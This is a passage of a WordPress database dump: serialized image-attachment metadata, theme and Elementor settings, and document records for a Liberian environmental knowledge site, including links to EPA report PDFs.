:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17873;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42234;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47242;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63603;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-02-at-13.41.04-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153271;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-600x400.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60422;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-02-at-13.41.04-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88506;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-02-at-13.41.04-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38066,5664,'_wp_attached_file','2025/12/news2222.jpeg'),(38067,5664,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1706;s:4:\"file\";s:21:\"2025/12/news2222.jpeg\";s:8:\"filesize\";i:1306412;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"news2222-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16570;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"news2222-1024x682.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117883;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"news2222-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7129;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"news2222-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73094;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"news2222-1536x1024.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:235750;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:23:\"news2222-2048x1365.jpeg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402254;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"news2222-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24621;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"news2222-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5466;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"news2222-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13487;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"news2222-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31458;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"news2222-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33758;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"news2222-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50762;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"news2222-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133545;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:23:\"news2222-1920x1080.jpeg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318644;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"news2222-600x400.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49204;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"news2222-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67156;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"news2222-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150358;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38070,5662,'_thumbnail_id','5664'),(38071,5662,'_edit_last','38'),(38072,5662,'kava_extra_enable_breadcrumbs','inherit'),(38073,5662,'post_formats',''),(38074,5662,'gallery_tab',''),(38075,5662,'kava_extra_gallery_images',''),(38076,5662,'link_tab',''),(38077,5662,'kava_extra_link',''),(38078,5662,'kava_extra_link_target','_self'),(38079,5662,'quote_tab',''),(38080,5662,'kava_extra_quote_text',''),(38081,5662,'kava_extra_quote_cite',''),(38082,5662,'audio_tab',''),(38083,5662,'kava_extra_audio',''),(38084,5662,'kava_extra_audio_loop','false'),(38085,5662,'kava_extra_audio_autoplay','false'),(38086,5662,'kava_extra_audio_preload','false'),(38087,5662,'video_tab',''),(38088,5662,'kava_extra_video_type','library'),(38089,5662,'kava_extra_video_library',''),(38090,5662,'kava_extra_video_external',''),(38091,5662,'kava_extra_video_poster',''),(38092,5662,'kava_extra_video_width','770'),(38093,5662,'kava_extra_video_height','480'),(38094,5662,'kava_extra_video_loop','false'),(38095,5662,'kava_extra_video_autoplay','false'),(38096,5662,'kava_extra_video_preload','false'),(38097,5662,'_elementor_edit_mode','builder'),(38098,5662,'_elementor_template_type','wp-post'),(38099,5662,'_elementor_version','3.7.8'),(38100,5662,'_elementor_pro_version','3.7.7'),(38104,5666,'_last_editor_used_jetpack','classic-editor'),(38105,5666,'_edit_lock','1765189237:38'),(38106,5666,'_edit_last','38'),(38107,5667,'_wp_attached_file','2025/12/Screenshot-2025-12-08-at-09.56.51.png'),(38108,5667,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1344;s:6:\"height\";i:1734;s:4:\"file\";s:45:\"2025/12/Screenshot-2025-12-08-at-09.56.51.png\";s:8:\"filesize\";i:1606321;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-233x300.png\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76506;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-09.56.51-794x1024.png\";s:5:\"width\";i:794;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:754019;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29279;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-768x991.png\";s:5:\"width\";i:768;s:6:\"height\";i:991;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:539070;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-12-08-at-09.56.51-1191x1536.png\";s:5:\"width\";i:1191;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1571919;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128069;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2025-12-08-at-09.56.51-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20060;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68298;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:180256;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:189309;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:301467;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-09.56.51-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:940643;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-12-08-at-09.56.51-1344x1080.png\";s:5:\"width\";i:1344;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1176406;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-600x774.png\";s:5:\"width\";i:600;s:6:\"height\";i:774;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:393206;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-09.56.51-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:396200;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-09.56.51-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:995712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38109,5668,'_wp_attached_file','2025/12/Summary-Report-of-the-National-Carbon-Dialogue-Report-EPA-October-2025-Final-Report.pdf'),(38110,5668,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1779502;}'),(38111,5666,'_wp_page_template','default'),(38112,5666,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/12/Summary-Report-of-the-National-Carbon-Dialogue-Report-EPA-October-2025-Final-Report.pdf'),(38113,5666,'by','EPA'),(38114,5666,'year','21–22 August 2025'),(38115,5666,'_pods_document_cover_image','a:1:{i:0;i:5667;}'),(38117,5666,'_pods_attached_document','a:1:{i:0;i:5668;}'),(38129,5666,'document_cover_image','5667'),(38130,5666,'attached_document','5668'),(38131,5674,'_last_editor_used_jetpack','classic-editor'),(38132,5674,'_edit_lock','1765193515:38'),(38133,5674,'_edit_last','38'),(38134,5675,'_wp_attached_file','2025/12/Screenshot-2025-12-08-at-10.39.02.png'),(38135,5675,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1344;s:6:\"height\";i:1734;s:4:\"file\";s:45:\"2025/12/Screenshot-2025-12-08-at-10.39.02.png\";s:8:\"filesize\";i:931901;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-233x300.png\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:74361;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-10.39.02-794x1024.png\";s:5:\"width\";i:794;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:789781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21545;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-768x991.png\";s:5:\"width\";i:768;s:6:\"height\";i:991;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:307680;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-12-08-at-10.39.02-1191x1536.png\";s:5:\"width\";i:1191;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1588376;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102717;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2025-12-08-at-10.39.02-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13377;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54706;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122428;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:191415;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:241531;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-10.39.02-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:597517;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-12-08-at-10.39.02-1344x1080.png\";s:5:\"width\";i:1344;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:446771;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-600x774.png\";s:5:\"width\";i:600;s:6:\"height\";i:774;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:293511;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2025-12-08-at-10.39.02-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:195878;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-12-08-at-10.39.02-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:349518;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38136,5676,'_wp_attached_file','2025/12/BOMI.pdf'),(38137,5676,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:3068517;}'),(38138,5674,'_wp_page_template','default'),(38142,5674,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/12/BOMI.pdf'),(38143,5674,'by','EPA'),(38144,5674,'year','2024'),(38145,5674,'_pods_document_cover_image','a:1:{i:0;i:5675;}'),(38146,5674,'document_cover_image','5675'),(38147,5674,'_pods_attached_document','a:1:{i:0;i:5676;}'),(38148,5674,'attached_document','5676'),(38153,5682,'_last_editor_used_jetpack','classic-editor'),(38154,5682,'_edit_lock','1765893613:38'),(38155,5682,'_edit_last','38'),(38156,5683,'_edit_lock','1765478837:38'),(38157,5683,'_last_editor_used_jetpack','block-editor'),(38158,5684,'_wp_attached_file','2025/12/ED-pic.jpeg'),(38159,5684,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1280;s:4:\"file\";s:19:\"2025/12/ED-pic.jpeg\";s:8:\"filesize\";i:142780;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"ED-pic-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15292;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"ED-pic-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110190;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"ED-pic-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6647;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"ED-pic-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110190;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"ED-pic-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19884;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"ED-pic-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4183;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"ED-pic-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12411;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"ED-pic-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29380;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"ED-pic-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34713;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"ED-pic-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42404;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:19:\"ED-pic-960x650.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85946;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:20:\"ED-pic-960x1080.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143450;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"ED-pic-600x800.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75255;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"ED-pic-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62060;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:19:\"ED-pic-960x640.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77507;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38160,5685,'_wp_attached_file','2025/12/WhatsApp-Image-2025-12-11-at-18.01.24.jpeg'),(38161,5685,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1600;s:4:\"file\";s:50:\"2025/12/WhatsApp-Image-2025-12-11-at-18.01.24.jpeg\";s:8:\"filesize\";i:261430;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19107;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.24-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7867;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.24-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133506;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-12-11-at-18.01.24-1152x1536.jpeg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:252798;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23800;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-12-11-at-18.01.24-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4878;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15058;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35583;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42691;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50215;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.24-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106674;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-12-11-at-18.01.24-1200x1080.jpeg\";s:5:\"width\";i:1200;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193267;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-600x800.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93473;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.24-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73819;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.24-1200x640.jpeg\";s:5:\"width\";i:1200;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"